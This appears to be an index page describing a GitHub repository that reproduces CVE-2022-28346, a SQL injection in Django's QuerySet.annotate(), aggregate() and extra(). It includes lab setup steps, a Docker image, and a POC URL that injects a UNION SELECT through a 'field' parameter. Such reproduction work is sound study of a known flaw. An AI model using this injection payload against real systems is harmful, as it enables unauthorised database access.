Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/DeEpinGh0st/CVE-2022-28346

Django QuerySet.annotate(), aggregate(), extra() SQL 注入
https://github.com/DeEpinGh0st/CVE-2022-28346

Last synced: about 2 months ago
JSON representation

Django QuerySet.annotate(), aggregate(), extra() SQL 注入

Host: GitHub
URL: https://github.com/DeEpinGh0st/CVE-2022-28346
Owner: DeEpinGh0st
Created: 2022-04-26T14:47:56.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-05-31T03:28:34.000Z (over 2 years ago)
Last Synced: 2024-11-20T23:01:06.613Z (about 2 months ago)
Language: Python
Size: 49.8 KB
Stars: 23
Watchers: 3
Forks: 5
Open Issues: 2
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - DeEpinGh0st/CVE-2022-28346 - Django QuerySet.annotate(), aggregate(), extra() SQL 注入 (Python)

README

        ### CVE-2022-28346

Django QuerySet.annotate(), aggregate(), extra() SQL 注入

### 环境初始化

```

1.python manage.py makemigrations

2.python manage.py migrate

3.访问http://x.x.x.x:8000/ 插入初始化数据

```

### 漏洞复现

```

访问http://x.x.x.x:8000/demo

POC: http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --

```

![image-20220426224053969](./image-20220426224053969.png)

### Docker

```

docker pull s0cke3t/cve-2022-28346:latest

```